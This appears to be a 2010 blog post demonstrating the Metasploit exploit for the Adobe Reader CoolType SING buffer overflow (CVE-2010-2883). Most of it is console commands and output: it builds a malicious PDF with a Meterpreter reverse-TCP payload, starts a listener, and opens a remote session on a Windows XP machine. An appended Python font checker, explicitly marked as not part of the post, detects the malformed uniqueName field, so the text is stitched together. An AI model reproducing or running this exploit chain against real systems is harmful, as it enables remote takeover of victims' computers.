Thursday, September 9, 2010

Adobe 0day CoolType and Metasploit

Once more Metasploit is way ahead of the competition, this time with a 0day for Adobe PDF Reader. Having some time today, I thought I'd give it a try.

In a Windows 7 VM, I got the latest PDF reader from Adobe (version 9.3.4 at the moment).

Now, on the Metasploit console:

root@fr:~/trunk# ./msfconsole
msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) >

msf exploit(adobe_cooltype_sing) > info

       Name: Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
    Version: $Revision$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  Unknown
   <@sn0wfl0w>
   <@vicheck>
  jduck

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name        Current Setting                 Required  Description
  ----        ---------------                 --------  -----------
  FILENAME    msf.pdf                         yes       The file name.
  OUTPUTPATH  /home/root/trunk/data/exploits  yes       The location of the file.

Payload information:
  Space: 1000
  Avoid: 1 characters

Description:
  This module exploits a vulnerability in the Smart INdependent
  Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of
  Adobe Reader. Prior version are assumed to be vulnerable as well.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
  http://www.osvdb.org/67849
  http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
  http://www.adobe.com/support/security/advisories/apsa10-02.html


msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > exploit

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Creating 'msf.pdf' file...
[*] Generated output file /home/root/trunk/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_cooltype_sing) >

Let's get the msf.pdf now and start a generic handler on the msfconsole.



msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...

On Windows 7 now,

Clicking the msf icon,


No luck at the moment on Windows 7: the application crashed with no session. Trying the same on Windows XP, the screen shows the following:


And on our server we have:

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...

[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:23369) at Thu Sep 09 11:31:38 +0300 2010

meterpreter > sysinfo
Computer: TEST1-150C1E9C9
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter >

I hope it won't take long for the Windows 7 version.
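The module info above names the bug as a stack buffer overflow in the SING table's "uniqueName" field of an embedded font. As an added example (not part of this post or of Metasploit), here is a small Python checker that parses a TrueType/OpenType table directory, locates a SING table, and flags a uniqueName that has no NUL terminator inside its field; the field offset (16) and length (28) are taken from the SING table layout and are assumptions here, and the fixture font is constructed for the test.

```python
import struct

SING_UNIQUENAME_OFFSET = 16   # assumption: uniqueName starts 16 bytes into the SING table
SING_UNIQUENAME_LEN = 28      # assumption: the field is 28 bytes and must hold a NUL terminator


def parse_table_directory(font):
    """Return {tag: (offset, length)} from an sfnt (TrueType/OpenType) header."""
    if len(font) < 12:
        raise ValueError("too short for an sfnt header")
    num_tables = struct.unpack(">H", font[4:6])[0]
    tables = {}
    for i in range(num_tables):
        rec = 12 + 16 * i
        if rec + 16 > len(font):
            raise ValueError("table directory truncated")
        tag, _checksum, offset, length = struct.unpack(">4sIII", font[rec:rec + 16])
        tables[tag] = (offset, length)
    return tables


def sing_unique_name_is_terminated(font):
    """True if there is no SING table or its uniqueName holds a NUL within the field.

    False means the field is unterminated or the table is too short to hold it:
    either way a string copy that stops at NUL would run past the field.
    """
    tables = parse_table_directory(font)
    if b"SING" not in tables:
        return True
    offset, _length = tables[b"SING"]
    start = offset + SING_UNIQUENAME_OFFSET
    field = font[start:start + SING_UNIQUENAME_LEN]
    return len(field) == SING_UNIQUENAME_LEN and b"\x00" in field


def build_font(unique_name):
    """Constructed minimal sfnt holding one SING table (a test fixture, not a usable font)."""
    name = unique_name.ljust(SING_UNIQUENAME_LEN, b"\x00")[:SING_UNIQUENAME_LEN]
    sing = b"\x00" * SING_UNIQUENAME_OFFSET + name + b"\x00" * 20  # trailing bytes stand in for the rest
    header = b"\x00\x01\x00\x00" + struct.pack(">HHHH", 1, 16, 0, 0)  # version, numTables=1, search fields
    record = struct.pack(">4sIII", b"SING", 0, 12 + 16, len(sing))  # single table right after the record
    return header + record + sing
```

Fonts embedded in a PDF live in FontFile2/FontFile3 streams, usually Flate-compressed; decode the stream first and pass the raw sfnt bytes to the checker.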
